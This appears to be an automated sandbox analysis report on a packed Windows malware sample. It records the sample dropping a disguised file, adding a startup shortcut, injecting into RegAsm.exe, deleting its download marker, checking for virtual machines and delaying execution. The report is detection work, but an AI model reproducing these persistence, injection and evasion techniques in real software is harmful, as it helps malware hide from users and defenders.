Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C29D30 pushad ; retf	13_2_02C29D31

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_00404D61 LoadLibraryA,GetProcAddress,

0_2_00404D61

Source: wIQLBHYbqz.exe	Static PE information: real checksum: 0x10d8fc should be: 0x139c1f
Source: RMActivate_isv.exe.bat.0.dr	Static PE information: real checksum: 0x10d8fc should be: 0x14151e

Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 22.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 22.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

File created: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat

Jump to dropped file

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

File created: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat

Jump to dropped file

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sdchange.lnk

Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sdchange.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Detected FrenchyShellcode packer

Show sources

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Mutex created: \Sessions\1\BaseNamedObjects\frenchy_shellcode_001			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Mutex created: \Sessions\1\BaseNamedObjects\frenchy_shellcode_001			Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_00404A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00404A35

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe TID: 4864	Thread sleep count: 2878 > 30	Jump to behavior
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe TID: 4864	Thread sleep count: 3460 > 30	Jump to behavior
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe TID: 4864	Thread sleep time: -34600s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat TID: 6892	Thread sleep count: 2602 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat TID: 6892	Thread sleep count: 300 > 30	Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Thread sleep count: Count: 2878 delay: -10	Jump to behavior
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Thread sleep count: Count: 3460 delay: -10	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Thread sleep count: Count: 2602 delay: -10	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Window / User API: threadDelayed 2878	Jump to behavior
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Window / User API: threadDelayed 3460	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: foregroundWindowGot 494	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Window / User API: threadDelayed 2602	Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 13_2_05560BB6 GetSystemInfo,

13_2_05560BB6

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: wIQLBHYbqz.exe, 00000000.00000002.617226072.0000000003876000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: wIQLBHYbqz.exe, 00000000.00000002.611076331.0000000000C17000.00000004.00000020.sdmp	Binary or memory string: vmtoolsd.exePA1'
Source: RegAsm.exe, 0000000D.00000002.611058214.0000000001440000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_00435CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435CCC

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

0_2_00435CCC

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_00404D61 LoadLibraryA,GetProcAddress,

0_2_00404D61

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_3_014100AD mov ecx, dword ptr fs:[00000030h]	0_3_014100AD
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_3_014100AD mov eax, dword ptr fs:[00000030h]	0_3_014100AD
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_3_014101CB mov eax, dword ptr fs:[00000030h]	0_3_014101CB
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Code function: 14_3_016D00AD mov ecx, dword ptr fs:[00000030h]	14_3_016D00AD
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Code function: 14_3_016D00AD mov eax, dword ptr fs:[00000030h]	14_3_016D00AD
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Code function: 14_3_016D01CB mov eax, dword ptr fs:[00000030h]	14_3_016D01CB

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_0042A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A395

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: F35008			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: B9C008			Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

0_2_00404A35

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe			Jump to behavior

Source: wIQLBHYbqz.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: wIQLBHYbqz.exe, 00000000.00000002.617226072.0000000003876000.00000004.00000001.sdmp	Binary or memory string: [CLASS:Progman]gWj`)
Source: RegAsm.exe, 0000000D.00000002.614989807.0000000003468000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: wIQLBHYbqz.exe, RegAsm.exe, 0000000D.00000002.611903455.0000000001700000.00000002.00020000.sdmp, RMActivate_isv.exe.bat, 0000000E.00000002.615012630.0000000001B90000.00000002.00020000.sdmp, RegAsm.exe, 00000016.00000002.611132272.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: wIQLBHYbqz.exe, 00000000.00000002.611482400.0000000000C73000.00000004.00000001.sdmp	Binary or memory string: [CLASS:Progman].
Source: wIQLBHYbqz.exe, 00000000.00000002.615093463.0000000001A10000.00000002.00020000.sdmp, RegAsm.exe, 0000000D.00000002.611903455.0000000001700000.00000002.00020000.sdmp, RMActivate_isv.exe.bat, 0000000E.00000002.615012630.0000000001B90000.00000002.00020000.sdmp, RegAsm.exe, 00000016.00000002.611132272.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 0000000D.00000002.611058214.0000000001440000.00000004.00000020.sdmp	Binary or memory string: Program Manager0^
Source: RegAsm.exe, 0000000D.00000002.613498826.000000000328F000.00000004.00000001.sdmp	Binary or memory string: Program Managerp
